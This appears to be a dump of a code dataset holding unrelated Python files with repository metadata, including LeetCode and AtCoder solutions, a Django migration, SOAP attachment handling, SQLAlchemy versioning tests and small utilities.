"""Returns true if both objects are equal"""
if not isinstance(other, V1beta1LocalSubjectAccessReview):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"JeffYFHuang@github.com"
] |
JeffYFHuang@github.com
|
40e963c4b3b5b9e68d8105b83d2b6b6c606d607d
|
04cfd073ca0ce0e55a437ea6c1fd6536873d7553
|
/ex45.py
|
37c91b8eb307fd86a3ac004192e82bea6f32e679
|
[] |
no_license
|
randy-wittorp/ex
|
5a682be54cf72404349fe397e4c7b3357d2b32d8
|
f8c22f0507609e69dadaf8a847dd7d8c4aad304f
|
refs/heads/master
| 2016-09-05T09:57:14.924825
| 2015-05-11T02:37:28
| 2015-05-11T02:37:28
| 35,258,942
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,960
|
py
|
from sys import argv
script, filename = argv
print "=" * 40, '\n\n'
print "Let's make up a bunch of different types of rooms for a game."
print "At anytime, enter [Q] to quit.\n\n"
target = open(filename, 'w')
game_rooms = []
while True:
room = {}
# get the name of a room
print "First, what type of room is it? Let's give it a name."
room['name'] = raw_input("> ").lower().capitalize()
if room['name'].lower() == 'q':
break
print "Great! %s is a great room type.\n" % room['name']
# get the description of a room
print "Write a short description of a %s" % room['name']
room['description'] = raw_input("> ")
if room['description'].lower() == 'q':
break
print "\nWe're making great progress! So far we have this:"
print "%s:" % room['name'], room['description']
# get the greeting for the player as he enters
print "\nWhat would you like the player to read as he enters the %s?" % room['name']
room['greeting'] = raw_input("> ")
if room['greeting'].lower() == 'q':
break
# add it to the list!!!!
game_rooms.append(room)
print "\n\n", "That room's done! Let's do another! \n", "=" * 40
print "Remember, [Q]uit will get you out of here.\n\n"
# print game_rooms
for room in game_rooms:
print """class %s(Room):
\"\"\"%s\"\"\"
def __init__(self)
self.greeting = \"%s\"
""" % (room['name'], room['description'], room['greeting'])
#need to write a Dungeon/Room class that has coord mgmt system
#Dungeon.__init__ should take two integers for a width and height. Rooms could be created at random, and the Room class could determine available directions to move
#Each Specific type of room should have a short puzzle to overcome, then give the available paths (N, S, E, W)
#Dungeon will store a two dimensional list of rooms
#will need to import random to generate random rooms
|
[
"="
] |
=
|
789a17b497fcabc2aa2f1afd85c5bd55ffaf58a1
|
6af81c1e3853255f064ce58e848b34211decdd23
|
/test/top/api/rest/DeliveryTemplateDeleteRequest.py
|
ed625006af2c7cf18003711289ed9a7a170cdc58
|
[] |
no_license
|
dacy413/TBAutoTool
|
d472445f54f0841f2cd461d48ec6181ae2182d92
|
ca7da4638d38dd58e38c680ee03aaccf575bce7b
|
refs/heads/master
| 2016-09-06T16:13:01.633177
| 2015-02-01T00:04:50
| 2015-02-01T00:04:50
| 29,625,228
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 328
|
py
|
'''
Created by auto_sdk on 2015-01-20 12:36:26
'''
from top.api.base import RestApi
class DeliveryTemplateDeleteRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.template_id = None
def getapiname(self):
return 'taobao.delivery.template.delete'
|
[
"1656505353@qq.com"
] |
1656505353@qq.com
|
fa3a4ad9a1fb7ac12f9eeee873960f975fe4b561
|
083b3f5b0d23c269c6a9ff1ea413e70fb799a497
|
/Leetcode Challenge/09_September_2020/Python/Week 1/4_Partition Labels.py
|
d7760779eeaf21e4b1358e275335701835e975b5
|
[] |
no_license
|
HectorIGH/Competitive-Programming
|
b2e02dff140d9ebb06c646f7be0b53ea0afe90c9
|
467058c63e8a7e76805feebe3020bac4d20516a6
|
refs/heads/master
| 2022-12-31T18:32:46.824626
| 2020-10-16T20:38:33
| 2020-10-16T20:38:33
| 279,733,136
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,275
|
py
|
#A string S of lowercase English letters is given. We want to partition this string into as many parts as possible so that each letter appears in at most one part, and return a list of integers representing the size of these parts.
#
#
#
#Example 1:
#
#Input: S = "ababcbacadefegdehijhklij"
#Output: [9,7,8]
#Explanation:
#The partition is "ababcbaca", "defegde", "hijhklij".
#This is a partition so that each letter appears in at most one part.
#A partition like "ababcbacadefegde", "hijhklij" is incorrect, because it splits S into less parts.
#
#
#Note:
#
#S will have length in range [1, 500].
#S will consist of lowercase English letters ('a' to 'z') only.
#
#
# Hide Hint #1
#Try to greedily choose the smallest partition that includes the first letter. If you have something like "abaccbdeffed", then you might need to add b. You can use an map like "last['b'] = 5" to help you expand the width of your partition.
class Solution:
def partitionLabels(self, S: str) -> List[int]:
last = {c: i for i, c in enumerate(S)}
j = 0
anchor = 0
ans = []
for i, c in enumerate(S):
j = max(j, last[c])
if i == j:
ans.append(i - anchor + 1)
anchor = i + 1
return ans
|
[
"HectorIGH@users.noreply.github.com"
] |
HectorIGH@users.noreply.github.com
|
bd38508a4ddf2cb90bdd31c649292c99a7e7cbf3
|
b343b5101e453fff9d59a1644ba54f77ead0bad2
|
/face_test/metric-distance.py
|
a951870b8795d33ac57810c90c148f74b0b74e86
|
[] |
no_license
|
BarshaGuha/face-detect-recognize
|
cb0643f9297d803d3b05ae1f7036757c8ba43d0b
|
d193669c3a68b645d9cce30378c20d225d0fef7f
|
refs/heads/master
| 2020-04-10T16:04:12.846940
| 2018-10-31T07:21:22
| 2018-10-31T07:21:22
| 161,132,045
| 1
| 1
| null | 2018-12-10T07:05:46
| 2018-12-10T07:05:46
| null |
UTF-8
|
Python
| false
| false
| 2,869
|
py
|
#python
#similarity distance
今天一个偶然的机会体会到了python数据运算的强大。求一个数组各样本之间的距离仅简单的几句代码就行。看来真的技术改变世界啊。废话不多说,记下来怕以后忘记。
[python] view plain copy
from scipy.spatial.distance import pdist, squareform
下面结合API文档标注一下具体用法:
[python] view plain copy
1.X = pdist(X, 'euclidean')
计算数组X样本之间的欧式距离 返回值为 Y 为压缩距离元组或矩阵(以下等同)
[python] view plain copy
2. X = pdist(X, 'minkowski', p)
计算数组样本之间的明氏距离
[python] view plain copy
3. Y = pdist(X, 'cityblock')
计算数组样本之间的曼哈顿距离
[python] view plain copy
4. X = pdist(X, 'seuclidean', V=None)
计算数组样本之间的标准化欧式距离 ,v是方差向量,表示 v[i]表示第i个分量的方差,如果缺失。默认自动计算。
[python] view plain copy
5. X = pdist(X, 'sqeuclidean')
计算数组样本之间欧式距离的平方
[python] view plain copy
6. X = pdist(X, 'cosine')
计算数组样本之间余弦距离 公式为:
[python] view plain copy
7. X = pdist(X, 'correlation')
计算数组样本之间的相关距离。
[python] view plain copy
8.X = pdist(X, 'hamming')
计算数据样本之间的汉明距离
[python] view plain copy
9. X = pdist(X, 'jaccard')
计算数据样本之间的杰卡德距离
[python] view plain copy
10. X = pdist(X, 'chebyshev')
计算数组样本之间的切比雪夫距离
[python] view plain copy
11. X = pdist(X, 'canberra')
[python] view plain copy
计算数组样本之间的堪培拉距离
[python] view plain copy
12. X = pdist(X, 'mahalanobis', VI=None)
[python] view plain copy
计算数据样本之间的马氏距离
还有好多不常用的距离就不一一写出了,如果想查阅可以点 点我,点我
[python] view plain copy
除了对指定的距离计算该函数还可以穿lmbda表达式进行计算,如下
[python] view plain copy
dm = pdist(X, lambda u, v: np.sqrt(((u-v)**2).sum()))
二、得到压缩矩阵后还需下一步即:
[python] view plain copy
Y=scipy.spatial.distance.squareform(X, force='no', checks=True)
[python] view plain copy
其中,X就是上文提到的压缩矩阵Y,force 如同MATLAB一样,如果force等于‘tovector’ or ‘tomatrix’,输入就会被当做距离矩阵或距离向量。
[python] view plain copy
cheak当X-X.T比较小或diag(X)接近于零,是是有必要设成True的,<span style="font-family: Arial, Helvetica, sans-serif;">返回值Y为一个距离矩阵Y[i,j]表示样本i与样本j的距离。</span>
|
[
"lixiaoyu283284@163.com"
] |
lixiaoyu283284@163.com
|
39569cf295296908556488db4b1939a139e7dd20
|
037a97b5de833dfdd6b9489e776cf6be651c2703
|
/fpraktikum/migrations/0013_auto_20170913_1402.py
|
d86db83742caf7dadcea2f1acefe1883b435a415
|
[
"MIT"
] |
permissive
|
PhysikOnline/fpraktikum_backend
|
6fc6ec521749f92387e7b99873b27a73b255d46a
|
b040aef86dba6137f1c5d0fd936143a48b4f9c13
|
refs/heads/master
| 2021-04-18T19:46:24.019906
| 2020-03-15T15:43:16
| 2020-03-15T15:43:16
| 126,201,619
| 2
| 1
|
MIT
| 2020-06-05T17:37:58
| 2018-03-21T15:38:11
|
Python
|
UTF-8
|
Python
| false
| false
| 2,404
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-13 14:02
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('fpraktikum', '0012_auto_20170912_1105'),
]
operations = [
migrations.AlterModelOptions(
name='fpwaitlist',
options={'verbose_name': 'Waitlist', 'verbose_name_plural': 'Waitlists'},
),
migrations.RenameField(
model_name='fpwaitlist',
old_name='user_snumber',
new_name='user_login',
),
migrations.AddField(
model_name='fpuserpartner',
name='user_matrikel',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Matrikelnumber'),
),
migrations.AddField(
model_name='fpuserregistrant',
name='user_matrikel',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Matrikelnumber'),
),
migrations.AddField(
model_name='fpwaitlist',
name='user_firstname',
field=models.CharField(max_length=100, null=True, verbose_name='user firstname'),
),
migrations.AddField(
model_name='fpwaitlist',
name='user_lastname',
field=models.CharField(max_length=100, null=True, verbose_name='user lastname'),
),
migrations.AddField(
model_name='fpwaitlist',
name='user_matrikel',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Matrikelnummer'),
),
migrations.AlterUniqueTogether(
name='fpuserpartner',
unique_together=set([('user_firstname', 'user_lastname', 'user_email', 'user_login', 'user_matrikel')]),
),
migrations.AlterUniqueTogether(
name='fpuserregistrant',
unique_together=set([('user_firstname', 'user_lastname', 'user_email', 'user_login', 'user_matrikel')]),
),
migrations.RemoveField(
model_name='fpwaitlist',
name='user_name',
),
migrations.AlterUniqueTogether(
name='fpwaitlist',
unique_together=set([('user_firstname', 'user_lastname', 'user_email', 'user_login', 'user_matrikel')]),
),
]
|
[
"chgad.games@gmail.com"
] |
chgad.games@gmail.com
|
d421307da7fd37864161ea2092ae764586add0c4
|
c1a0c19b236a7291d1ab510611206ff8946b8655
|
/run.py
|
d5a367baaa99410b1277617e4727f2711ff0be6c
|
[] |
no_license
|
LeeHuangChen/2018_03_22_MosaicFinderResultAnalysis
|
5e211e5d3a931ae8030ac0a8b907f99863262f98
|
dcf0de140a3385ac2f5b4f3efc08fa84c890af26
|
refs/heads/master
| 2021-04-15T13:06:05.928299
| 2018-03-22T22:53:13
| 2018-03-22T22:53:13
| 126,397,794
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,783
|
py
|
import Configurations as conf
import os
from cPickle import load
from src import util
def readResultFile(folder, filename):
fusedDict = {}
familyDict = {}
with open(os.path.join(folder, filename)) as f:
for i, line in enumerate(f):
if i > 0:
# reference:
# 0 1 2 3 4
# gene_id fusion_event family_number start_med_align1 end_med_align1
# 5 6 7
# start_med_align2 end_med_align2 break_point
arr = line.split("\t")
# family proteins only have 3 values
pid = arr[0]
fEvent = arr[1]
familyNumMF = arr[2]
if pid[0] == 'f':
# print line
splitInfo = pid.split("_")
if len(splitInfo) > 3:
familyNumber = -2
else:
familyNumber = int(splitInfo[0][1:])
if fEvent in familyDict.keys():
subDict = familyDict[fEvent]
if type(subDict[1]) != list:
subDict[1] = []
subDict[2] = []
subDict[3] = []
subDict[int(familyNumMF)].append(familyNumber)
else:
familyDict[fEvent] = {0: [], 1: [], 2: [], 3: []}
familyDict[fEvent][int(familyNumMF)].append(familyNumber)
else:
# print line, len(arr)
splitInfo = pid.split("_")
if len(splitInfo) <= 2:
f1 = -1
f2 = -1
else:
# id = splitInfo[1]
f1 = int(splitInfo[3])
f2 = int(splitInfo[5])
# g = int(splitInfo[7])
# split = int(splitInfo[9])
fusedDict[pid] = [fEvent, f1, f2]
return fusedDict, familyDict
def main():
filenames = os.listdir(conf.inputFolder)
util.generateDirectories(conf.resultFolder)
with open(os.path.join(conf.resultFolder, "Results.txt"), "w") as wf:
wf.write("TEvo\tNFam\tNFusions\tavgConf\tnumProt\n")
for filename in filenames:
# reference:
# 0 1 2 3 4 5 6 7 8 9 10 11 12
# M_mjtt_SeqL_1000_NFam_2_NFusions_2_TEvo_1.5_NGen_5_ BorderInformation
parsed = filename.split("_")
# model = parsed[1]
# seqLen = parsed[3]
NFam = parsed[5]
NFusions = parsed[7]
TEvo = parsed[9]
# NGen = parsed[11]
fusedDict, familyDict = readResultFile(conf.inputFolder, filename)
confidenceArr = []
for pid in fusedDict.keys():
fEvent, f1, f2 = fusedDict[pid]
mf1s = familyDict[fEvent][1]
mf2s = familyDict[fEvent][2]
success = 0
totalAssigns = len(mf1s) + len(mf2s)
print pid
print mf1s
print mf2s
#print familyDict[fEvent][3]
success1 = 0
success2 = 0
for f in mf1s:
if f == f1:
success1 += 1
for f in mf2s:
if f == f1:
success2 += 1
if success1 > success2:
mf1 = mf1s
mf2 = mf2s
else:
mf1 = mf2s
mf2 = mf1s
for f in mf1:
if f == f1:
success1 += 1
for f in mf2:
if f == f2:
success2 += 1
# if totalAssigns == 0:
# confi = 0
# else:
# confi = float(success)/totalAssigns
if success1 > 0 and success2 > 0:
confi = 1
elif success1 == 0 and success2 == 0:
confi = 0
else:
confi = .5
confidenceArr.append(confi)
print confi, success, totalAssigns
avgConf = reduce(lambda x, y: x + y, confidenceArr)/float(len(confidenceArr))
wf.write(str(TEvo) + "\t" + str(NFam) + "\t" + str(NFusions) + "\t")
wf.write(str(avgConf) + "\t" + str(len(fusedDict.keys())) + "\n")
if __name__ == '__main__':
main()
|
[
"lhc1@rice.edu"
] |
lhc1@rice.edu
|
ba073293648a25847d17dc772cd96e10004f5085
|
2c1e06ff5fc659188735bba84707d07ab1578f58
|
/backend/deposits/helpers/banks.py
|
9cd234c213c944457aa8ac2d9acf51c35b5db110
|
[] |
no_license
|
aviaryan/deposits-app
|
b15db26d4fe79d5934b36167d2edfa70c1f009f2
|
dc6e4e93749aa2001feba35b461b4c1168a893a1
|
refs/heads/master
| 2021-03-30T21:26:24.923656
| 2018-05-11T09:06:40
| 2018-05-11T09:06:40
| 124,782,433
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,013
|
py
|
# bank = https://tin.tin.nsdl.com/tan/Bank.html
BANKS = """
Allahabad Bank
Andhra Bank
Axis Bank
Bank of Bahrain and Kuwait
Bank of Baroda - Corporate Banking
Bank of Baroda - Retail Banking
Bank of India
Bank of Maharashtra
Canara Bank
Central Bank of India
City Union Bank
Corporation Bank
Deutsche Bank
Development Credit Bank
Dhanlaxmi Bank
Federal Bank
ICICI Bank
IDBI Bank
Indian Bank
Indian Overseas Bank
IndusInd Bank
ING Vysya Bank
Jammu and Kashmir Bank
Karnataka Bank Ltd
Karur Vysya Bank
Kotak Bank
Laxmi Vilas Bank
Oriental Bank of Commerce
Punjab National Bank - Corporate Banking
Punjab National Bank - Retail Banking
Punjab & Sind Bank
Shamrao Vitthal Co-operative Bank
South Indian Bank
State Bank of Bikaner & Jaipur
State Bank of Hyderabad
State Bank of India
State Bank of Mysore
State Bank of Patiala
State Bank of Travancore
Syndicate Bank
Tamilnad Mercantile Bank Ltd.
UCO Bank
Union Bank of India
United Bank of India
Vijaya Bank
Yes Bank Ltd
"""
BANKS = list(BANKS.strip().split('\n'))
|
[
"avi.aryan123@gmail.com"
] |
avi.aryan123@gmail.com
|
2e37aa5d9e2825c50325ba060540a1765c2d14f7
|
0475a5b592a4f9d9bff229dc4308ab6a5e6f1ba9
|
/pyalysis/_compat.py
|
c839af6cebaec9d4342a3128f85843d17b9f8a3a
|
[
"BSD-3-Clause"
] |
permissive
|
DasIch/pyalysis
|
5f7cf7ff188739e117136315a79e1cb8a6aa9734
|
314fd86c268b9b0fd61bf4ab2dbf10810e77a8bf
|
refs/heads/master
| 2016-09-06T05:51:00.478360
| 2014-02-26T02:54:49
| 2014-02-26T02:54:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,772
|
py
|
# coding: utf-8
"""
pyalysis._compat
~~~~~~~~~~~~~~~~
:copyright: 2014 by Daniel Neuhäuser and Contributors
"""
import sys
import codecs
try:
import __pypy__
del __pypy__
PYPY = True
except ImportError:
PYPY = False
PY2 = sys.version_info[0] == 2
if PY2:
text_type = unicode
def implements_iterator(cls):
cls.next = cls.__next__
del cls.__next__
return cls
stdout = codecs.lookup(
sys.stdout.encoding or 'utf-8'
).streamwriter(sys.stdout)
stderr = codecs.lookup(
sys.stderr.encoding or 'utf-8'
).streamwriter(sys.stderr)
else:
text_type = str
def implements_iterator(cls):
return cls
stdout = sys.stdout
stderr = sys.stderr
# copied from Flask: flask/_compat.py
# copyright 2014 by Armin Ronacher
# licensed under BSD
#
def with_metaclass(meta, *bases):
# This requires a bit of explanation: the basic idea is to make a
# dummy metaclass for one level of class instantiation that replaces
# itself with the actual metaclass. Because of internal type checks
# we also need to make sure that we downgrade the custom metaclass
# for one level to something closer to type (that's why __call__ and
# __init__ comes back from type etc.).
#
# This has the advantage over six.with_metaclass in that it does not
# introduce dummy classes into the final MRO.
class metaclass(meta):
__call__ = type.__call__
__init__ = type.__init__
def __new__(cls, name, this_bases, d):
if this_bases is None:
return type.__new__(cls, name, (), d)
return meta(name, bases, d)
return metaclass('temporary_class', None, {})
|
[
"dasdasich@gmail.com"
] |
dasdasich@gmail.com
|
14935b76244e1588351e41945ab39bd8eda80882
|
18a79067223932c2f7aa6ff6b81d0b3f36169db2
|
/atcoder/abc198/A.py
|
3a9ccde63436d9b2a4c9eedca30aad16300ec6a6
|
[] |
no_license
|
aadiupadhyay/CodeForces
|
894b0e5faef73bfd55a28c2058fb0ca6f43c69f9
|
76dac4aa29a2ea50a89b3492387febf6515cf43e
|
refs/heads/master
| 2023-04-12T17:58:52.733861
| 2021-05-07T20:08:00
| 2021-05-11T20:07:11
| 330,149,645
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 591
|
py
|
# aadiupadhyay
import os.path
from math import gcd, floor, ceil, factorial
from collections import *
import sys
mod = 1000000007
INF = float('inf')
def st(): return list(sys.stdin.readline().strip())
def li(): return list(map(int, sys.stdin.readline().split()))
def mp(): return map(int, sys.stdin.readline().split())
def inp(): return int(sys.stdin.readline())
def pr(n): return sys.stdout.write(str(n)+"\n")
def prl(n): return sys.stdout.write(str(n)+" ")
if os.path.exists('input.txt'):
sys.stdin = open('input.txt', 'r')
sys.stdout = open('output.txt', 'w')
n = inp()
pr(n-1)
|
[
"upadhyay.aaditya2001@gmail.com"
] |
upadhyay.aaditya2001@gmail.com
|
56d5ba5271e24ce0b3cba44c3f85cb51a3403840
|
aac418419c2ef4d10c5c4ceb607d3d8329a5f395
|
/Algorithms/Miscellaneous/Gcd.py
|
bd88fe1c2e7a751961f75b187fda83c809005b18
|
[] |
no_license
|
sudhirshahu51/projects
|
bb13395227355ff84933b6d3a0f158ee42bcdceb
|
b2d8331d14d2163b20535368a60c81f6c8bc2c8f
|
refs/heads/master
| 2021-01-01T17:09:18.654060
| 2017-04-24T10:46:15
| 2017-04-24T10:46:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
# To find the greatest common divisor
def gcd(x,y):
if x == 0:
return y
else:
return gcd(y%x, x)
|
[
"deveshaggrawal19@gmail.com"
] |
deveshaggrawal19@gmail.com
|
2ebe4b45268b5fbc1b7af9b11f7786c3d33e1429
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_nick.py
|
08c83ac70115fc28cd22074d9bc50429622e92b8
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 373
|
py
|
#calss header
class _NICK():
def __init__(self,):
self.name = "NICK"
self.definitions = [u'a small cut in a surface or an edge: ', u'prison: ', u'a stated condition, especially of health: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
40f2752d77ccabe27f319e292703ae57571be5d9
|
7a3c194356437db110671ad163f03df1344a5e87
|
/code/utils/debug/processinfo.py
|
7eb8cf32210c745af00544bfa293ec2de1123e71
|
[
"MIT"
] |
permissive
|
dmytrov/gaussianprocess
|
6b181afdb989415ec929197cdb20efee571ebbcc
|
7044bd2d66f44e10656fee17e94fdee0c24c70bb
|
refs/heads/master
| 2022-12-08T22:23:11.850861
| 2020-09-14T19:37:33
| 2020-09-14T19:37:33
| 295,513,701
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,303
|
py
|
import os
import psutil
_proc_status = '/proc/%d/status' % os.getpid()
_scale = {'kB': 1024.0, 'mB': 1024.0*1024.0,
'KB': 1024.0, 'MB': 1024.0*1024.0}
def _VmB(VmKey):
'''Private.
'''
global _proc_status, _scale
# get pseudo file /proc/<pid>/status
try:
t = open(_proc_status)
v = t.read()
t.close()
except:
return 0.0 # non-Linux?
# get VmKey line e.g. 'VmRSS: 9999 kB\n ...'
i = v.index(VmKey)
v = v[i:].split(None, 3) # whitespace
if len(v) < 3:
return 0.0 # invalid format?
# convert Vm value to bytes
return float(v[1]) * _scale[v[2]]
def memory(since=0.0):
'''Return memory usage in bytes.
'''
return _VmB('VmSize:') - since
def resident(since=0.0):
'''Return resident memory usage in bytes.
'''
return _VmB('VmRSS:') - since
def stacksize(since=0.0):
'''Return stack size in bytes.
'''
return _VmB('VmStk:') - since
def print_meminfo(message=""):
'''Prints memory useage
'''
process = psutil.Process(os.getpid())
mem = process.memory_info()
print("|{} |PID: {} |rss: {}MB |vms: {}MB |".format(
message, process.pid, mem.rss / float(2**20), mem.vms / float(2**20)))
if __name__ == "__main__":
print_meminfo()
|
[
"dmytro.velychko@gmail.com"
] |
dmytro.velychko@gmail.com
|
ceb9352b0878dace0d3cd48be46ad14679a4847b
|
aec4fcd0361b9292c48178e5e77cab5df17f8f44
|
/DRL/Base.py
|
f90397ddb2603f156ecb04afe07cb33123db724e
|
[
"Apache-2.0"
] |
permissive
|
kbehouse/ezDRL
|
99bf2d1b37fceaa219651264c2f865ef3c70b146
|
1f8e5675780700d8e66f753fceac17c2b36fa56b
|
refs/heads/master
| 2021-08-24T12:39:48.804699
| 2017-12-05T09:05:53
| 2017-12-05T09:05:53
| 110,926,129
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 533
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: DRL.py
# Description: Abstract Class For DRL Methods
# Author: Kartic <kbehouse@gmail.com>
import six
from abc import ABCMeta,abstractmethod
@six.add_metaclass(ABCMeta)
class RL(object):
@abstractmethod
def choose_action(self, state):
pass
@abstractmethod
def train(self, states, actions, rewards, next_state, done):
pass
@six.add_metaclass(ABCMeta)
class DRL(RL):
@abstractmethod
def _build_net(self, msg):
pass
|
[
"kbehouse@gmail.com"
] |
kbehouse@gmail.com
|
c858313d78d4f1f97702e366a93be4fd43b773ca
|
22f1c0d8406be377e588ac0eaeea7bd19385156c
|
/src/zeep/wsdl/attachments.py
|
6a85312813d7e7288a0ade3ed9b22b4bc7827ab0
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
mbehrle/python-zeep
|
999be22a91f6df04b995b823dc68ae83953fb046
|
5921b047d4fda2d87d9ab178fd37ef77d70d1a1f
|
refs/heads/master
| 2021-01-23T08:04:47.801530
| 2017-01-31T11:39:47
| 2017-01-31T11:39:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,727
|
py
|
"""Basic implementation to support SOAP-Attachments
See https://www.w3.org/TR/SOAP-attachments
"""
import base64
from cached_property import cached_property
from requests.structures import CaseInsensitiveDict
class MessagePack(object):
def __init__(self, parts):
self._parts = parts
def __repr__(self):
return '<MessagePack(attachments=[%s])>' % (
', '.join(repr(a) for a in self.attachments))
@property
def root(self):
return self._root
def _set_root(self, root):
self._root = root
@cached_property
def attachments(self):
return [Attachment(part) for part in self._parts]
def get_by_content_id(self, content_id):
for attachment in self.attachments:
if attachment.content_id == content_id:
return attachment
class Attachment(object):
def __init__(self, part):
self.headers = CaseInsensitiveDict({
k.decode(part.encoding): v.decode(part.encoding)
for k, v in part.headers.items()
})
self.content_type = self.headers.get('Content-Type', None)
self.content_id = self.headers.get('Content-ID', None)
self.content_location = self.headers.get('Content-Location', None)
self._part = part
def __repr__(self):
return '<Attachment(%r, %r)>' % (self.content_id, self.content_type)
@cached_property
def content(self):
encoding = self.headers.get('Content-Transfer-Encoding', None)
content = self._part.content
if encoding == 'base64':
return base64.b64decode(content)
elif encoding == 'binary':
return content
else:
return content
|
[
"michael@mvantellingen.nl"
] |
michael@mvantellingen.nl
|
c0f1f52cd692bb07290aa056b772de8af1130bde
|
6e1aa6cfe11a93740cdbc9503d992769ced8879b
|
/tests/test_column_inclusion_and_exclusion.py
|
c58313a1b040dd81981afb2faf5082b2e5c0d84b
|
[] |
no_license
|
dtheodor/sqlalchemy-continuum
|
04008d03209a1df930037e324e3f666a10a8abfc
|
22dbc811ac3a67d883da6b47584992d6dd22b20c
|
refs/heads/master
| 2021-01-22T16:32:22.137475
| 2014-10-23T09:55:15
| 2014-10-23T09:55:15
| 17,176,669
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,756
|
py
|
from datetime import datetime
from pytest import mark
import sqlalchemy as sa
from sqlalchemy_utils import TSVectorType
from sqlalchemy_continuum import version_class
from tests import TestCase
class TestDateTimeColumnExclusion(TestCase):
def create_models(self):
class Article(self.Model):
__tablename__ = 'article'
__versioned__ = {}
id = sa.Column(sa.Integer, autoincrement=True, primary_key=True)
name = sa.Column(sa.Unicode(255))
created_at = sa.Column(sa.DateTime, default=datetime.now)
creation_date = sa.Column(
sa.Date, default=lambda: datetime.now().date
)
is_deleted = sa.Column(sa.Boolean, default=False)
self.Article = Article
def test_datetime_columns_with_defaults_excluded_by_default(self):
assert (
'created_at' not in
version_class(self.Article).__table__.c
)
def test_date_columns_with_defaults_excluded_by_default(self):
assert (
'creation_date' not in
version_class(self.Article).__table__.c
)
def test_datetime_exclusion_only_applies_to_datetime_types(self):
assert (
'is_deleted' in
version_class(self.Article).__table__.c
)
@mark.skipif("os.environ.get('DB') != 'postgres'")
class TestTSVectorTypeColumnExclusion(TestCase):
def create_models(self):
class Article(self.Model):
__tablename__ = 'article'
__versioned__ = {}
id = sa.Column(sa.Integer, autoincrement=True, primary_key=True)
name = sa.Column(sa.Unicode(255))
search_vector = sa.Column(TSVectorType)
self.Article = Article
def test_tsvector_typed_columns_excluded_by_default(self):
assert (
'search_vector' not in
version_class(self.Article).__table__.c
)
class TestDateTimeColumnInclusion(TestCase):
def create_models(self):
class Article(self.Model):
__tablename__ = 'article'
__versioned__ = {
'include': 'created_at'
}
id = sa.Column(sa.Integer, autoincrement=True, primary_key=True)
name = sa.Column(sa.Unicode(255))
created_at = sa.Column(sa.DateTime, default=datetime.now)
self.Article = Article
def test_datetime_columns_with_defaults_excluded_by_default(self):
assert (
'created_at' in
version_class(self.Article).__table__.c
)
class TestColumnExclusion(TestCase):
def create_models(self):
class TextItem(self.Model):
__tablename__ = 'text_item'
__versioned__ = {
'exclude': ['content']
}
id = sa.Column(sa.Integer, autoincrement=True, primary_key=True)
name = sa.Column(sa.Unicode(255))
content = sa.Column(sa.UnicodeText)
self.TextItem = TextItem
def test_excluded_columns_not_included_in_version_class(self):
cls = version_class(self.TextItem)
manager = cls._sa_class_manager
assert 'content' not in manager.keys()
def test_versioning_with_column_exclusion(self):
item = self.TextItem(name=u'Some textitem', content=u'Some content')
self.session.add(item)
self.session.commit()
assert item.versions[0].name == u'Some textitem'
def test_does_not_create_record_if_only_excluded_column_updated(self):
item = self.TextItem(name=u'Some textitem')
self.session.add(item)
self.session.commit()
item.content = u'Some content'
self.session.commit()
assert item.versions.count() == 1
|
[
"konsta.vesterinen@gmail.com"
] |
konsta.vesterinen@gmail.com
|
200adc49c9d7032f1d19d9caec3133ac4ebf1673
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/AtCoder/arc098/C/3270864.py
|
5c62ff7a855a8056aab79c2b97f8d36d0b122b1f
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303
| 2022-01-26T18:53:40
| 2022-01-26T18:53:40
| 211,783,197
| 23
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 802
|
py
|
from collections import defaultdict
N, K, Q = map(int, input().split())
A = list(map(int, input().split()))
A_sorted = sorted(A)
ans = float("inf")
ap = 0
for i, a in enumerate(A_sorted):
if a==ap:
continue
ap = a
L = [0]
d = defaultdict(list)
for aa in A:
if aa < a:
if L[-1]==0:
continue
else:
L.append(0)
else:
L[-1]+=1
d[aa].append(len(L)-1)
cnt = 0
aap = 0
for aa in A_sorted[i:]:
if aap==aa: continue
aap = aa
for v in d[aa]:
if L[v] >= K:
L[v] -= 1
cnt += 1
if cnt >= Q:
break
else:
break
ans = min(ans, aa-a)
print(ans)
|
